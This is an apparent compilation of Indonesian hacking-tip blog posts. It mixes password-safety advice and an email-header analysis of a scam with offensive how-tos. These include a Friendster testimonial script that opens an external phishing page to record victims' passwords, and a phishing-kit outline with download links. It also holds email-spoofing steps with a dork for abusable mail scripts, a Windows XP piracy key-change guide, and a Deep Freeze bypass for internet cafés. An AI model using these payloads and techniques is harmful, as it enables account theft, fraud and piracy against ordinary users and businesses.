Nah setelah mengetahui dua cara tersebut (masih ada beberapa cara yang lain, tapi yang tersering dan termudah adalah dengan dua cara tersebut), saya ingin memberikan sejumlah tips untuk menghindari hal seperti itu.

Pertama: mengingat yahoo messenger maupun yahoo email merupakan perangkat atau fasilitas yang bersifat gratis atau free maka siapapun dengan mudah dapat menggunakannya dan pihak yahoo tidak begitu memperdulikan jika id email maupun YM anda terkena kegiatan seperti ini. Untuk menghindari cracking cara pertama anda perlu memperkuat password anda seperti sering disarankan. Seperti menggunakan lebih dari 8 karakter. Tidak menggunakan nama anda, tanggal lahir anda, atau menggunakan password dengan kata yang sering digunakan atau yang terdapat dalam kamus. Menggunakan bermacam karakter sekaligus baik itu angka, huruf besar dan kecil serta karakter yang lainnya. Buat tidak berbunyi atau tidak bisa dibaca. (ini menghindari terdapatnya password anda dalam list password cracking mereka.

Yang kedua. Untuk menghindari cara kedua anda musti berhati hati jika ada sebuah email atau private message yang mengarahkan anda untuk menuliskan password yahoo anda. Baik itu dalam bentuk windows private message (PM atau IM) maupun dalam bentuk halaman sebuah situs (webpage).

Yang keempat adalah untuk menghindari lock id ym jangan gunakan email anda untuk keperluan chatting di dunia yahoo messenger.

Yang kelima. Akan lebih baik jika anda menggunakan email yang berbayar atau memiliki reversibilitas (kemampuan layanan balik) yang bagus. Bisa juga dari email perusahaan anda atau institusi anda atau layanan email milik anda sendiri. Dengan cara ini jika terjadi proses cracking dan sang cracker mengganti password anda (ini jika beruntung karena bisa jadi mereka menghancurkan isi mail anda), anda bisa meminta kepada admin atau webmasternya untuk mengembalikan atau memberikan kembali alamat email yang di crack tersebut. Pihak yahoo tidak menyediakan hal ini kepada anda. Anda mau komplain kepada om yahoo, saya yakin akan tidak ditanggapi dan menyuruh membuat account yang baru. Berbahaya bukan. Tapi ini resiko memiliki email gratisan.

Demikian sekedar berbagi
Semoga Bermanfaat

Cil, terusannya mana......

Hacking Mudah Cara Copy Paste Save Text Tulisan dari Detik dot Com

Jika anda pemburu berita dan juga seorang yang mengingingkan berita tersebut terkliping dengan rapi atau ingin di copy paste save (dikutip atau dikuote) untuk disimpan, dibawa dan dibaca dirumah (kalau misalnya anda konek dari warnet) maka sebuah proteksi copy paste semisal yang diterapkan oleh detik.com merupakan hal yang menyebalkan. Apalagi kalau kita ingin menyusun data data tentang kejadian tertentu dan ingin menganalisanya atau mungkin bahkan untuk bahan skripsi anda, tindakan melarang copy paste save text dengan cara menggunakan java script tertentu adalah hal yang menyusahkan.

Jangan khawatir dan jangan patah arang atau semangat. Saya akan berikan cara paling mudah dan paling cepat untuk mengatasi segala permasalahan anda. Detik dot com bukanlah penjara yang menerapkan kunci yang tidak mungkin bisa di buka atau dijebol.

Pertama siapkanlah Firefox anda, bisa juga pake internet browser yang lain tetapi saya memilih menggunakan firefox. Kemudian bukalah satu halaman dari detiknews, atau halaman dari detik dot com yang lain yang menerapkan proteksi atau larangan copy paste. Setelah anda buka cobalah anda klik kanan halaman yang ada textnya. Biasanya anda tidak bisa melakukakan klik kanan pada mouse anda. Bahkan untuk membold atau aja tidak bisa. Inilah proteksi detik.com yang saya maksudkan.

Mungkin anda sudah bisa atau mengetahui cara melakukan trick melepaskan kunci proteksi text dari situs detik ini, jika sudah abaikan saja tulisan ini. Yang pasti cara ini saya kasih atau berikan dan tujukan kepada pemula yang kebingungan untuk menlakukan “quotation” alias kutipan atau kopi paste tulisan tulisan yang ada di situs warta detik .com.

Sudah basa basinya. Sekarang ke langkah selanjutnya.

Karena anda tidak bisa mengkopi paste maka hal yang harus anda lakukan adalah mematikan mesin atau engine atau script larangan copy paste ini. Nah inilah inti dari trick hacking security text copy paste dari detik.com

Cara yang termudah ya matikan saja javascript anda di browser anda Alias di disable. Mudah bukan? He he he. Gak perlu software gak perlu pengetahuan rumit. Pokoknya dijamin berhasil deh.

Pergi ke Tab Tools, lalu pilih Options. Entar akan muncul windows baru dan dari situ pilihlah Tab Content. Hilangkan tanda centang di Enable JavaScript sama Enable Java. Click OK. Nah sekarang coba bold text di situs warta detik dot com dan klik kanan.

FireFox >> Tools >> Options >> Content >> Enable JavaScript + Enable Java (dihilangkan tanda centangnya)

Nah sekarang anda bisa copy paste dan save atau simpan text tulisan itu semau anda. Mudah bukan?? He he he. Kalau sudah jangan lupa kembalikan settingan enable JavaScript ma Enable Java ke posisi semula. Lalu browsing lagi. Nah kalau mau kopi paste lagi lakukan hal yang sama seperti diatas. Jadi deh.

Sekedar Info
Semoga Bermanfaat

Cil, terusannya mana......

Cara Hacking Account FS

.teman²,,,,,biar ndak ketipu ama "Para Penipu FS" (salah omong ndak ya?? heheheh),,,ini Saya coba kasi Tips .Hacking Acoount FS (kalo ada yang salah tolong di perbaiki ach) :


.1. Masuk ke testimonial teman anda / target anda. misal http://www.friendster.com/armencakep
.2. Masukkan :
.halo sayang gantengku atau (apa terserah asal ada tulisan),
.2. lalu Copy source yang saya attach di topik ini (members only), select All semua huruf dan tulisan yang ada .jangan ampe ada yang ketinggalan.
.4. Paste source nya di bawah tulisan kita tadi
3. Lalu tunggu sampai approve testimonialnya.
4. Setelah di approve maka anda dapat menunggu target atau para pengguna friendster membuka fs target dan tentu saja melakukan login di friendster target anda. ( Saat fs target terbuka maka dalam beberapa detik / waktu langsung berubah halaman menjadi halaman untuk login yang hasilnya akan Password direcord di www.yogyafree.net/familycode/friendster.txt

---.("html")
---.("head")
---.("title"hackfs"/title")
---.("meta http-equiv=”Content-Type” content=”text/html; charset=iso-8859-1″")
---.("/head")

---.("body bgcolor=”#00FFFF” text=”#000000″")

---.("SCRIPT LANGUAGE=”JavaScript”")
---.("!– Begin")
---.("function popupPage() {")
---.("var page = “http://www.yogyafree.net/familycode/friendster.html”;")
---.("windowprops = “”")
---.(";")

---.("window.open(page, “hackfs”, windowprops);")
---.("}")
---.("// End –")
---.("/script""BODY onLoad=”setTimeout(’popupPage()’, 1000);”"")
---.(""/p"")
---.("Isi Testimonial ya")
---.("/body")
---.("/html")


.Selamat Mencoba ya teman² semuanya....heheheheeeeeeeeeeeee

kalo ndak isa make " , make <> aja

Cil, terusannya mana......

Email setan

cara ngirim email palsu ke email orang, mayan ne bwat ngerjain orang
cari aja di google dengan keyword :
inurl:XcCDONTS.asp (ada salah satu yang masih aktif cari sendiri yeeee)
aku sudah buktiin sendiri bo’
hasilnya emang bener2 yahuut bgt

artikel ini bukan untuk 7an merusak ato neko2 tapi hanya untuk pengetahuan….Ok
try it’s

Cil, terusannya mana......

Seni Teknik Hacking I

jk_seni_teknik_hacking1_sto_155sh.jpg

Buku terbitan Jasakom yang satu ini merupakan awal bacaan yang baik bagi anda yang tertarik pada dunia sekuriti komputer. Buku ini menerangkan teknik-teknik dasar hacking yang pernah dilakukan dan masih dilakukan oleh para hacker.

Dengan mengetahui teknik-teknik yang mereka lakukan, anda dapat berpikir secara lebih terbuka untuk lebih mengamankan sistem komputer anda, terutama yang terkoneksi dengan jaringan komputer dan internet.

Meskipun anda tidak akan menjadi seorang hacker hanya dengan buku ini, namun anda dapat belajar mencegah diri anda menjadi korban para hacker.

Diulas dengan bahasa sederhana Khas penulis S’to dan dilengkapi CD berisi program yang dibahas, semakin membuat anda tidak akan bosan membaca buku ini hingga halaman terakhir.

Buku ini tepat untuk anak SMA/Kuliah yang mulai tertarik pada dunia IT.

Cil, terusannya mana......

Membuat Windows XP anda “Asli”

Mungkin banyak yang sudah tau mengenai trik ini. Tapi masih banyak juga yang blom tau kok. Jadi saya beri sedikit tutorial untuk mengubah Windows XP “Mangga Dua” anda menjadi Windows XP “Asli”.

Mudah kok, sebelum memulai download dulu Tools Pendukungnya disini :

Magical Jelly Bean Key Finder

Oke anda cuma perlu 7 Langkah jitu :

1. Ekstrak file yang anda download barusan. Lihat-lihat deh ada file apa aja.

2. Jalankan program Microsoft Genuine Advantage Diagnostic Tool.

gambar1.jpg

Nah…Ketahuan masih palsu tuh !

3. Okey, sekarang jalanin program Key Finder, Klik Options , Change Window Keys

gambar2.jpg

4. Buka File Windows XP Key.txt

gambar3.jpg

5. Masukin serialnya deh, trus klik Change

gambar4.jpg

6. “Your Product Key Has Been Successfully Update” . Okeh.

gambar5.jpg

7. Cek lagi windows anda dengan Microsoft Genuine Advantage Diagnostic Tool

gambar6.jpg

Eng..ing…eng…dah “ASLI” deh windowsnya. Anda bisa menikmati update gratis dari Microsoft. Enakkan ? Hehehe…

Cil, terusannya mana......

Konsep Membuat Email Palsu

Pernahkah anda mendapat email berisi undian berhadiah? Atau sebuah email seperti yang saya terima berikut ini :

Email Palsu

Jelas email ini sangat mencurigakan, pertama karena saya bukan siapa-siapa dari keluarga cendana, jadi aneh sekali mendapat email seperti ini :D Kedua setahu saya perbankkan adalah lembaga yang mudah menerima uang tapi sulit untuk meminjamkan uang, apalagi dihibahkan dengan cara gratis seperti ini, sungguh tidak masuk akal.Mungkin orang ini mengira bahwa saya akan tergiur oleh harta dan hilang akal sehatnya, ternyata dia salah ! Saya lebih tergiur jika dapet beasiswa keluar negeri.Hehehe…

Oke, kita lanjutkan investigasinya. Hal pertama yang dapat kita lakukan adalah melihat “header” dari email tersebut. Untuk melihat lebih rinci asal-usul email palsu ini. Pada gmail anda dapat melakukannya dengan mengklik tombol disamping reply, kemudian klik pada Show Original :

Show Header

Berikut isi header dari email tersebut :

Delivered-To: carolus.agung@gmail.comReceived: by 10.141.132.19 with SMTP id j19cs287823rvn;
Tue, 25 Mar 2008 07:52:22 -0700 (PDT)
Received: by 10.141.20.7 with SMTP id x7mr3371904rvi.34.1206456740563;
Tue, 25 Mar 2008 07:52:20 -0700 (PDT)
Return-Path:
Received: from secure.greatmail.com (secure.greatmail.com [216.18.5.71])
by mx.google.com with ESMTP id g1si5009158rvb.0.2008.03.25.07.52.20;
Tue, 25 Mar 2008 07:52:20 -0700 (PDT)
Received-SPF: neutral (google.com: 216.18.5.71 is neither permitted nor denied by best guess record for domain of angie@rooftoprentals.net) client-ip=216.18.5.71;
Authentication-Results: mx.google.com; spf=neutral (google.com: 216.18.5.71 is neither permitted nor denied by best guess record for domain of angie@rooftoprentals.net) smtp.mail=angie@rooftoprentals.net
Received: (qmail 4135 invoked by uid 1041); 25 Mar 2008 14:52:20 -0000
X-AntiVirus: Clean
Message-ID: <20080325145220.4121.qmail@greatmail1.nmsrv.com>
Cc: recipient list not shown: ;
From: ahmed.faye@bankconfidentials.com
Reply-To: ahmed.faye@hotmail.com
Subject: CONFIDENTIAL PROPOSAL!!!
Date: Tue, 25 Mar 2008 07:52:19 -0700
Mime-Version: 1.0
Content-Type: text/plain; format=flowed; charset="iso-8859-1"
Content-Transfer-Encoding: 7bit

Hal yang paling menarik ada pada tulisan yang saya cetak tebal dan garis bawahi yang menunjukkan ternyata email ini dikirimkan dari secure.greatmail.com dengan user tanpa nomer ip (secure.greatmail.com [216.18.5.71]). Sebab ip 216.18.5.71 ternyata merupakan ip dari situs greatmail.com tersebut. Untuk mengecek suatu nomer ip kita dapat menggunakan fasilitas dari situs http://cqcounter.com/whois/.

Situs CQCounter

Dari situs ini kita mendapat informasi tentang pemilik ip 216.18.5.71 :

IP Address   : 216.18.5.71 [ secure.greatmail.com ]
ISP : Bell Canada
Organization : Gossamer Threads
Location : CA CA, Canada
City : Vancouver, BC -
Latitude : 49°25'00" North
Longitude : 123°13'33" West

Dengan modus inilah sang penipu tidak dapat terlacak, kecuali dilakukan investigasi lebih lanjut oleh pemilik situs greatmail.com. Tapi satu yang kita tahu pasti, email tersebut jelas bukan dari bankconfidentials.com atau dari kuala lumpur, sebab email ini dikirimkan dari kanada [server greatmail.com].

Teknik pemalsuan email seperti ini sesungguhnya sangat mudah dilakukan. Saya akan memberikan sebuah “keisengan” untuk memberi contohnya.

Hal pertama yang kita lakukan untuk membuat email palsu adalah mencari smtp server untuk mengirimkan email.Sebagai contoh saya ingin menggunakan smtp server gmail.Buka command prompt anda dan ketikkan perintah seperti dibawah ini :

C:\Users\Agung>nslookup -querytype=mx gmail.com

Nanti akan di dapat hasil seperti berikut :

C:\Users\Agung>nslookup -querytype=mx gmail.com
Server: XX.XX.XX.XX
Address: xx.xx.xx.xx:xx

Non-authoritative answer:
gmail.com MX preference = 5, mail exchanger = gmail-smtp-in.l.google.com
gmail.com MX preference = 10, mail exchanger = alt1.gmail-smtp-in.l.google
.com
gmail.com MX preference = 10, mail exchanger = alt2.gmail-smtp-in.l.google
.com
gmail.com MX preference = 50, mail exchanger = gsmtp147.google.com
gmail.com MX preference = 50, mail exchanger = gsmtp183.google.com

gmail.com nameserver = ns3.google.com
gmail.com nameserver = ns4.google.com
gmail.com nameserver = ns1.google.com
gmail.com nameserver = ns2.google.com
gmail-smtp-in.l.google.com internet address = 209.85.147.27
gmail-smtp-in.l.google.com internet address = 209.85.147.114
alt1.gmail-smtp-in.l.google.com internet address = 66.249.83.114
alt1.gmail-smtp-in.l.google.com internet address = 66.249.83.27
alt2.gmail-smtp-in.l.google.com internet address = 66.249.91.27
gsmtp147.google.com internet address = 209.185.147.27
gsmtp183.google.com internet address = 64.233.183.27
ns1.google.com internet address = 216.239.32.10
ns2.google.com internet address = 216.239.34.10
ns3.google.com internet address = 216.239.36.10
ns4.google.com internet address = 216.239.38.10

C:\Users\Agung>

Untuk mempermudah kita gunakan saja smtp server yang Non-authoritative. Pada contoh kali ini saya gunakan smtp server : gsmtp183.google.com.

Kemudian bukalah Email client yan anda miliki dan buatlah account baru. Pada contoh kali ini saya menggunakan program bawaan Windows Mail, anda juga bisa menggunakan Outlook Express jika menggunakan windows xp. Pertama-tama masukkan nama yang anda inginkan, disini saya memberi nama Presiden Kuda.

Presiden Kuda

Kemudian buatlah nama email yang anda inginkan. Disini saya menuliskan presiden@kudaliar.com.

Presiden Kuda Liar

Selanjutnya masukkan Incoming Mail server anda dengan asal aja, disini saya mencontohkan pop.gmail.com dan juga Outgoing E-Mail Server yang telah kita dapat tadi yaitu gsmtp183.google.com

Gmail

Untuk internet mail logon, biarkan apa adanya, langsung next lalu finish.

Mail logon

Selanjutnya buatlah email Anda !! Disini saya akan mengirimkan email kepada diri saya sendiri :) dengan subjek Surat Penting dari Presiden Kuda :

Surat dari Presiden Kuda

Sampai disini selesailah sudah proses pembuatan dan pengiriman email palsu. Selanjutnya kita akan melihat apakah email palsu ini sampai atau tidak di inbox mail saya. Gambar dibawah ini menunjukkan ternyata email palsu ini telah sampai, namun berada pada kelompok Spam.

Spam email

Lalu bagaimana caranya supaya dapat masuk ke inbox seperti pada email dari penipu tersebut ? Eiits…saya tidak mengajarkan anda untuk jadi penipu ! Oleh karena itu sekian tutorial kali ini. Akhir kata, ingatlah kata-kata bang napi di tiap akhir episode, WASPADALAH !! WASPADALAH !!

Cil, terusannya mana......

Hacker Secret - Friendster Hacking

Pernahkah friendster account anda dibajak oleh orang lain ? Sehingga profil anda menjadi berantakan atau bahkan primary fotonya berganti menjadi orang utan :P hehehe… Kalo ya, kemungkinan besar anda telah terjebak oleh situs friendster palsu, atau bahasa bekennya terkena phising.

Bagaimanakah phising ini dilakukan ? Ada beberapa teknik yang dapat anda lakukan untuk melakukan pemalsuan situs friendster guna untuk mencuri id dan password orang lain. Namun secara garis besar, ada 4 buah komponen yang diperlukan untuk melakukan friendster hacking.

Komponen pertama adalah halaman login palsu. Halaman login ini biasa dibuat dengan bahasa pemrograman web PHP. Halaman login ini dibuat semirip mungkin dengan halaman friendster saat anda belum melakukan login. Lihatlah tampilan berikut :

Halaman login tersebut biasanya diipload pada sebuah web hosting gratisan yang dapat menjalankan PHP script. Banyak sekali web hosting yang menyediakan jasa tersebut. Salah satunya adalah 110mb.com , tapi hati-hati sebelum anda memutuskan untuk melakukan phising, sebab seringkali pada web hosting gratisan tersebut telah tertulis ancaman seperti berikut :

** What will happen if you dare phish with your account… **

Warning!110mb has already captured your CPU ID (unique per every computer). Including your REAL I.P. and address via multiple advanced protocols (even if it’s faked by Proxy services). Should we find you phishing (like eBay, MySpace, PayPal, etc…), your ISP will be contacted and proof forwarded to your local police for prosecution.

524 people have already been arrested and prosecuted by their local police thanks to us.

Jadi berhati-hatilah sebelum melakukan keisengan, hehehe….

Komponen kedua adalah file teks guna menyimpan semua hasil input yang didapat dari halaman login friendster yang palsu tersebut. Hal ini tidak perlu saya uraikan lebih lanjut, karena saya yakin anda pasti mengerti.

Komponen ketiga adalah file javascipt, yang berguna untuk melakukan redirect menuju halaman login palsu yang telah anda simpan pada web hosting gratisan.

Komponen keempat adalah script linker yang akan menjalankan java script (yang berada di web hosting) pada friendster anda. Script ini biasa disisipkan pada kolom-kolom tertentu pada profile friendster yang memiliki kelemahan, seperti pada Who Want to meet (telah di patch) , aplikasi emote dan sebagainya. Saya tidak akan menjelaskan lebih rinci untuk hal ini, karena friendster selalu meng-update situsnya, sehingga dibutuhkan informasi celah keamanan terbaru untuk dapat menyisipkan script linker tersebut.

Ada sebuah buku terbitan di gramedia yang saya baca sekilas, menulis sebuah teknik tambahan yaitu dengan menyisipkan file Flash yang telah diinjeksi javascript pada action scriptnya, kemudian baru pada profle friendster dimasukan sebuah script untuk membuka file flash tersebut. Namun saya sendiri belum pernah mencoba teknik tersebut.

Nah, dengan keempat komponen tersebut anda telah dapat melakukan phising pada situs friendster untuk mendapatkan user id dan password friendster orang lain. Anda dapat iseng-iseng melihat hasil dari halaman friendster palsu tersebut disini .

File-file yang anda butuhkan ada disini :

Login Palsu

Java Script Redirect

Script Linker

Greetz to : Rekan-rekan CCPB @ Kaskuser untuk Scriptnya :) .

Catatan : Penyalahgunaan informasi di Blog ini bukan tanggung jawab penulis. Penulis hanya memberikan masukan pengetahuan dan permasalahan keamanan.

Cil, terusannya mana......

Menjebol Deep Freeze 5

Tempat Publik seperti warnet biasanya diproteksi oleh program automatic-recovery seperti Deep Freeze. Hal ini tentunya sangat membantu bagi Administrator Warnet, karena tidak perlu pusing memikirkan soal Virus,Trojan,KeyLog,Spyware dan sebagainya. Setiap kali PC di restart maka semua data akan hilang dan kembali ke settingan awal.

Namun tampaknya Deep Freeze tidak luput dari serangan para Hacker. Terutama Deep Freeze versi 5 dan dibawahnya. Di Internet sudah banyak tersebar Tools bernama UnDeep Freeze yang dapat menon-aktifkan Deep Freeze meskipun kita tidak mengetahui passwordnya. Saat artikel ini ditulis memang sudah sangat basi kedengerannya :) tapi believe or not ternyata masih banyak Warnet yang tidak menyadari kelemahan dari Deep Freeze 5 dan kebawah.

Akhirnya para iseng mania (kalo tidak layak disebut Hacker) seperti saya , dan juga banyak orang lain diluar sana, dapat dengan mudah melumpuhkan Deep Freeze, dan bahkan menyebarkan virus buatan sendiri (ingat membuat Virus kian mudahnya).

Untuk itu bagi para penyedia layanan publik seperti warnet atau Laboratorium kampus, harap lebih aware terhadap hal yang seperti ini.Bila anda tidak percaya, anda dapat langsung mendownload Tools UnDeep Freeze 1.6 .

Bahkan untuk Deep Freeze 6 sudah ada yang berhasil menjebolnya juga, meski dengan cara yang sedikit lebih repot. Pada posting selanjutnya akan saya bahas.

Keep Secure !

Cil, terusannya mana......

Google Hacking

Ada beberapa Tools di internet yang bisa kita manfaatkan untuk mempermudah pencarian file, e-book, mp3, video, lirik, product key, tools, sampai font sekalipun.

Salah satu favorit saya adalah Google Hacks 1.5 dan Google Search File Finder

gambar7.jpg

Keduanya dapat anda Dowload disini :

Google Hacks

Google Search File Finder

Sebenarnya syntax-syntax untuk Google Hacking dapat anda tulis secara manual dan lebih detail sehingga lebih powerfull manfaatnya. Namun bila anda adalah End-User, tak ada salahnya menggunakan tools tersebut :)

Cil, terusannya mana......